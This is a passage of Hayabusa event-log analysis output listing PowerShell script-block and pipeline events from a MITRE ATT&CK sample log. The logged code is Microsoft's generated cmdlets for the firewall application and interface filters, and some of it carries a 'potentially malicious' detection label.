$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallApplicationFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.299 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetApplicationFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Program}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Package}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Program') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Program}) $__cmdletization_queryBuilder.FilterByProperty('AppPath', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Package') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Package}) $__cmdletization_queryBuilder.FilterByProperty('Package', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByApplication', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallApplicationFilter' -Alias '*' function Set-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallApplicationFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.300 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.301 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.302 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallApplicationFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.302 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallApplicationFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.338 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceFilter' -Alias '*' function Set-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${InterfaceAlias}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.338 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] 